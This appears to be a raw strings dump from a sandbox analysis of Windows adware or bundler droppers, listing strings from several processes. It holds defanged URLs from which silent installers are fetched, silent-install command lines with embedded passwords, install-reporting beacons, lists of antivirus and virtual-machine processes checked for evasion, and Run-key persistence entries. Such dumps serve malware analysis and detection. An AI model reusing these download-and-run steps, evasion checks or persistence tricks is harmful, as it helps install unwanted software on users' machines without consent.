FRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICK
NILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE
.?AVPropertyNotSupportedException@Poco@@
.?AVProcessHandleImpl@Poco@@
.?AVPipeImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AVHexEncoder@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.?AVCPzWebBrowser@@
c:\%original file name%.exe
16:36:36
2,467,144
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0@
/hXXp://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
hXXp://ts-ocsp.ws.symantec.com0;
/hXXp://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
/1(0&0$0"
hXXps://d.symcb.com/rpa0.
hXXp://s.symcd.com06
%hXXp://s.symcb.com/universal-root.crl0
<VeriSign Class 3 Public Primary Certification Authority - G50
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
%f(<(
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
7-777}7
>(>2>>>[>
2(222>2[2
1 2'2.252
=#=&>3>^>
3?3T3
1%1x1
; <2<;<]<
; ;$;(;,;0;4;
: :$:(:,:0:4:8:
3 3$3(3,3
? ?$?(?,?0?4?8?
1$1(1,101
3 3$3*3.363
>$> >2>~>
2-43494[4
91979<9]9
4 4$4(4,4044484
7 7$7(7,707'8.8
? ?$?(?,?0?4?
7$9(9,9094989
= =$=(=,=0=4=8=
3,4044484<4
9094989<9@9
< <$<(<,<0<4<
2 2$2(2,20242
8$80888|8
7 7(707<7`7
3$3,383`3
8 8@8\8`8
: :$:,:@:\:`:|:
> >@>`>|>
? ?(?0?<?`?
0(000<0`0
ADVAPI32.DLL
.mscoree.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
hXXp://xiaobingdou.com/reportInstallaa.aspx
"%s" %s
hXXp://xiaobingdou.com/reportInstallaaFinish.aspx
hXXp://down2.uc.cn/pcbrowser/down.php?pid=4043
hXXp://down2.uc.cn/pcbrowser/down.php?pid=4722
32:HKEY_CURRENT_USER\Software\UCBrowserPID;64:HKEY_CURRENT_USER\Software\UCBrowserPID
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_269.exe
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_260.exe
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_257.exe
hXXp://res.maoha.com/soft/mhwifi/MaoHaWiFiSetup_265.exe
32:HKEY_CURRENT_USER\Software\Maoha;64:HKEY_CURRENT_USER\Software\Maoha
hXXp://file2garage.pl/robots/webfriend.exe
"%s" /VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=64bitPOPS3
32:HKEY_LOCAL_MACHINE\SOFTWARE\KHT;64:HKEY_LOCAL_MACHINE\SOFTWARE\KHT
hXXp://45.32.112.142/setup.3.15.exe
hXXp://VVV.maginotline.net/pub0512.exe
32:HKEY_LOCAL_MACHINE\SOFTWARE\FrivClubS;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\FrivClubS
32:HKEY_LOCAL_MACHINE\SOFTWARE\Sakura:gamegogle;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Sakura:gamegogle
32:HKEY_LOCAL_MACHINE\SOFTWARE\somefungames;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\somefungames
32:HKEY_LOCAL_MACHINE\SOFTWARE\Jogotempo;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Jogotempo
32:HKEY_LOCAL_MACHINE\SOFTWARE\SkypeUpdateEx;64:HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\SkypeUpdateEx
somefungames.com
hXXp://pop.yeaplayer.com/get.aspx
hXXp://VVV.somefungames.com/res/sg3.6.0.0.exe
hXXp://pop.yeaplayer.com/click.aspx
hXXp://xiaobingdou.com/anzhuang.aspx
hXXp://xiaobingdou.com/jihuo.aspx
QQ.exe
procexp.exe
taskmgr.exe
AvastUI.exe
d\
hXXp://1212.ip138.com/ic.asp
hXXp://VVV.ip-adress.com/
/iplookup/iplookup.php
hXXp://int.dpool.sina.com.cn
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d&rt=%d --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&a=%d --- adadsada
TEST%d
hXXp://int.dpool.sina.com.cn/iplookup/iplookup.php?ip=
hXXp://ip138.com/ips138.asp?ip=
hXXp://cdn3.optimizely.com/js/geo2.js
hXXp://software77.net/geo-ip/
config.yeadesktop.com
down.yeadesktop.com
Download failed:%d
cmd /C %s
ndddddd
Mddddd
VBoxTray.exe
VBoxService.exe
VMwareUser.exe
VMwareTray.exe
VMUpgradeHelper.exe
vmtoolsd.exe
vmacthlp.exe
Nekrn.exe
BaiduAn.exe
BaiduSd.exe
360sd.exe
360rp.exe
360Safe.exe
360tray.exe
avguard.exe
avp.exe
avgui.exe
BavSvc.exe
rstray.exe
SSScheduler.exe
ccSvcHst.exe
KVwsc.exe
FilMsg.exe
secenter.exe
coreServiceShell.exe
Portuguese(Brazilian)
Portuguese(Standard)
Portugal
Turkey
GOOGLE CHROME
WebOptimum
9996655
EXPLORER.EXE
setup.exe
"%s" /UPGRADE:"%s"
"%s" /UPGRADE:FINSIH
\StringFileInfo\x\%s
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
s%s\%.4d-%.2d-%.2d %.2d.%.2d.%.2d.log
000000000000000
0000000
res://ieframe.dll/navcancl.htm#
iframe.htm
User-Agent:Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
User-Agent:Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
User-Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
User-Agent:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
User-Agent:Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11
User-Agent:Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
User-Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)
Kuaizip.lnk
MaohaWiFi.lnk
Chrome_WidgetWin_1
\Microsoft\Windows\Start Menu\Programs\
%s\%s
hXXp://dl.xvlhj.pw/8003/setup.exe
"%s" {8118C270CE041EA78C556FEF4C12EE48}
testcpu
hXXp://b3-31d2.kxcdn.com/B3.exe
rtestcpu_ok
testcpu_faild
"%s" /VERYSILENT /password=G@F@!-_F4bG_@S-?gF /subid=64bitPOPS

UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe_3920:

.text
`.rdata
@.data
.gfids
@.tls
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
PSSSSSSh
atlthunk.dll
operator
operator ""
GetProcessWindowStation
%S#[k
\\.\PhysicalDrive%d
\\.\IDE21201.VXD
ERROR: Could not open IDE21201.VXD file
\\.\Scsi%d:
Drive%dModelNumber
Drive%dSerialNumber
DriveÜontrollerRevisionNumber
DriveÜontrollerBufferSize
Drive%dType
X-X-X-X-X-X
-- %s --
%%X
RegCreateKeyTransactedW
RegOpenKeyTransactedW
RegDeleteKeyTransactedW
D:\UCChannel\ucchannel\Release\ChannelU.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.CRT$XCA
.CRT$XCAA
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data
.data$r
.gfids$x
.gfids$y
.tls$
.tls$ZZZ
.rsrc$01
.rsrc$02
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHFileOperationW
ShellExecuteW
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
WININET.dll
PSAPI.DLL
IPHLPAPI.DLL
WINTRUST.dll
VERSION.dll
GetProcessHeap
GetCPInfo
.?AVCHttpDownload@@
ChannelDllUrl=hXXp://down2.uc.cn/pcbrowser/down.php?type=dll
version=6.1.2107.204
ReportUrl=hXXp://mmstat.ucweb.com/
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
4"4(4,424
5:5_5'656
5(565>5{5
8$8(8,808
2,2:2@2[2
8 8-838:8[8
0%0U0g0
=#=?=\=|=
8$8/84898]8
8%9s9
11C1R1a1p1
:,;0;4;8;
< <$<(<,<
= =$=(=,=0=4=8=<=
: :<:@:`:
kernel32.dll
mscoree.dll
msvcrt.dll
ext-ms-win-ntuser-windowstation-l1-1-0
portuguese-brazilian
aavc.ini
UCBrowser.exe
hXXp://wow.uc.cn/biz-data/sec/channel/test/config/av_config.ini
UCBrowserSetup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
kxetray.exe
kxescore.exe
kislive.exe
kskinmgr.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
hXXp://mmstat.ucweb.com/
d\\.\%c:
\\.\PHYSICALDRIVE%d
bluesky.4.1.6.1.1
READ_URL_ERROR
READ_CHANNEL_BASE_URL_ERROR
PASS_PARAM_ERROR
EXTRACT_CHROMEPACKED7ZFILE_ERROR
UN7Z_TO_CHROME7Z_ERROR
UN7Z_TO_CHROMEBIN_ERROR
EXTRACT_TO_SETUPEXE_ERROR
UNCAB_TO_SETUPEXE_ERROR
RENAME_CHROME_FOLDER_ERROR
COPY_CHROME_FOLDER_ERROR
COPY_SETUPEXE_FILE_ERROR
RUN_SETUPEXE_FILE_ERROR
HTTP/1.1
Content-Length: %d
ChannelU.exe
ChannelDllUrl
PackageBaseUrl
ReportUrl
6.0.1121.13
config.ini
ChannelU.dll
hXXp://
\\.\X:
%d%d%d%d
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Advapi32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe
UCWeb Inc.
1.0.11.0
Copyright 2008-2016 UCWeb Inc. All rights reserved.

SearchProtocolHost.exe_3636:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_1904:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

MaohaWifiSvr.exe_632:

.text
`.rdata
@.data
.rsrc
@.reloc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
error RegOpenKeyEx
WifiRegWindowsRun
.\AutoStartProcessor.cpp
error RegOpenKeyEx CurrentUser
SubValue = %I64d. tickcount = %d
error open services has failed. tickcount = %d
error CAutoStartProcessor::BaseCreateProcessAsUser[%S]
CAutoStartProcessor::BaseCreateProcessAsUser[%S] OK
error LoadLibrary[%S]
.\CrashCatchInterface.cpp
error fCCInit[%d][%S]
.\driverloader.cpp
error SERVICE_RUNNING != ServiceStatus.dwCurrentState:%d
error fw.Add
.\init.cpp
.\main.cpp
MaohaWifiSvr.log
nCmdShow[%d] lpCmdLine[%S]
MaohaWifiSvr cmd %S
MaohaWifiSvr Uninstanll %s
.\MaohaFireWall.cpp
error QueryServiceStatus[%S]
error AddXP[%S][%S]
error AddWin7[%S][%S]
.\NotifyProcessor.cpp
error m_cs.SetName[%S]
ManualCheckUpdate bRet[%d]
error switch default m_pMapBuf->type[%d]
error BaseCreateProcessAsUser[%S]
BaseCreateProcessAsUser[%S] OK
bing.s.maohawifi.com
.\ProcessInfoCR.cpp
.\RepairSystemService.cpp
error firewall.StartSrv[SstpSvc]
error firewall.StartSrv[RasMan]
error firewall.StartSrv[MpsSvc] try again.
error firewall.StartSrv[MpsSvc]
error firewall.StartSrv[dot3svc]
error firewall.StartSrv[Wlansvc]
error firewall.StartSrv[DeviceInstall]
error firewall.StartSrv[WZCSVC]
error firewall.Add
error firewall.Add MaohaWifiSvr.exe
.\srvinst.cpp
from[%S]to[%S]
error MoveFileEx szIconCache[%S]
error MoveFileEx szFile[%S]
error SERVICE_RUNNING == ServiceStatus.dwCurrentState:%d
..\..\Common\dtl_base_common\base_critical.cpp
[%S]!
CBaseLog::LogInit
..\..\Common\dtl_base_common\base_log.cpp
[M---- -:-:-:%d][M][%s]---%s
ErrorCode = %d:%s
..\..\Common\dtl_base_common\base_proc.cpp
error fnGetFileVersionInfoSizeA %s
\StringFileInfo\xx\ProductVersion
error pVerValue:%s
..\wifiupdate\BaseFuncs.cpp
HUCmdBufApp
\adb\adb.exe
tips.exe
..\wifiupdate\DTLTips.cpp
Version[%d]
..\wifiupdate\SubmitProcessor.cpp
dispatch.s.maohawifi.com
UnionID[%d]
..\wifiupdate\SubStatInterface.cpp
STUDPProxy
error GetProcAddress m_fSTUDPProxy
STUDPTransfer
error GetProcAddress m_fSTUDPTransfer
STCmdApp
error GetProcAddress m_fSTCmdApp
error m_HUInterface.InitInterface
..\wifiupdate\UpdateProcessor.cpp
error m_HUInterface.AutoCheckUpdate
update.ss.maohawifi.com
\MaohawifiUpdate.dat
port
error MakeSureDirectoryPathExists %s
MaohaWifiSvr.exe
MaohaWiFiUpg.exe
update.xml
.\Repair\FireWall.cpp
error OpengService[%S]
relloc psevStatus memory %d
d:\svn\maohawifi\trunk\MaohaWiFi_New\WifiService\Release\MaohaWifiSvr.pdb
KERNEL32.dll
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
